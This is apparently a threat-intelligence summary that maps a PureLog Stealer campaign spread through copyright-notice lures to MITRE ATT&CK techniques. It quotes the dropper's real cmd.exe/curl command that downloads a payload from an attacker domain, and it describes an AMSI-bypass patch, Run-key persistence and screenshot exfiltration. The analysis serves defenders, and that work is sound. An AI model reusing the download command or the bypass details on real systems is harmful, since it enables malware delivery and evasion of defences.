Copyright Lures Mask a Multi‑Stage PureLog Stealer Attack on Key Industries

MITRE Techniques

• [T1204 ] User Execution – The campaign relies on victims manually executing localized malicious lures disguised as legal notices to start the chain (‘Dokumentation über Verstöße gegen Rechte des geistigen Eigentums.exe (translating to Documentation on Intellectual Property Rights Violations.exe)’)
• [T1059.003 ] Command and Scripting Interpreter (Windows Command Shell) – The dropper invokes cmd.exe and runs curl and extraction commands to download and stage payloads (‘cmd.exe /c start “” “._document.pdf” && curl -A “curl/meow_meow” -s -k -L “https://quickdocshare.com/DQ” -o “._invoice.pdf”‘)
• [T1105 ] Ingress Tool Transfer – The encrypted payload is fetched from attacker infrastructure using curl to pull the mislabeled invoice.pdf (‘curl -A “curl/meow_meow” -s -k -L “https://quickdocshare.com/DQ” -o “._invoice.pdf”‘)
• [T1574.001 ] Hijack Execution Flow: DLL Side‑Loading – The campaign initiates execution via DLL sideloading techniques as part of the dropper’s behavior (‘DLL sideloading to initiate execution’)
• [T1218 ] Signed Binary Proxy Execution – Operators execute a renamed WinRAR binary masquerading as a PNG to extract the encrypted archive using a remotely retrieved password (‘_FILE_2025년_재직증명서_원본.png … This file is actually a renamed WinRAR executable.’)
• [T1620 ] Reflective Code Loading – The Python loader bootstraps the CLR via COM calls and uses AppDomain.Load_3() to reflectively load an XOR/TripleDES‑decrypted .NET assembly entirely in memory (‘calls AppDomain.Load_3() to reflectively load and execute the payload’)
• [T1562.001 ] Impair Defenses: Disable or Modify Tools – The loader implements a two‑stage AMSI bypass by patching AmsiScanBuffer so it always returns non‑malicious (‘patches the entry point of AmsiScanBuffer with a MOV EAX, E_INVALIDARG + JMP instruction so the function always returns “not malicious”‘)
• [T1547.001 ] Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder – Persistence is achieved by creating a Run key entry named “SystemSettings” under the current user’s registry Run key (‘installs itself as a Windows autorun entry under the current user’s registry Run key. It uses “SystemSettings” as the value name’)
• [T1113 ] Screen Capture – The loader captures a full‑resolution desktop screenshot via GDI, builds a PNG in memory, and encodes it for exfiltration (‘captures the entire desktop at full resolution… manually constructs a valid PNG file in memory’)
• [T1082 ] System Information Discovery – Victim fingerprinting collects hostname, username, installed antivirus products via WMI for targeting and profiling (‘collects three pieces of victim identity data: the machine hostname, the logged-in username, and the names of all installed antivirus products’)
• [T1055 ] Process Injection – Observed attempts to inject into or create remote threads in other processes, using svchost.exe as a target (‘Observed process injection attempt, leveraging svchost.exe as the target process.’)
• [T1497 ] Virtualization/Sandbox Evasion – The loader includes anti‑virtual machine techniques to evade automated analysis environments (‘incorporates anti-virtual machine techniques to evade automated analysis environments.’)
• [T1041 ] Exfiltration Over C2 Channel – Collected screenshots and fingerprints are assembled into JSON and sent to the C2 server over HTTPS POST (‘All collected data is assembled into a JSON object and sent to the C&C server over HTTPS.’)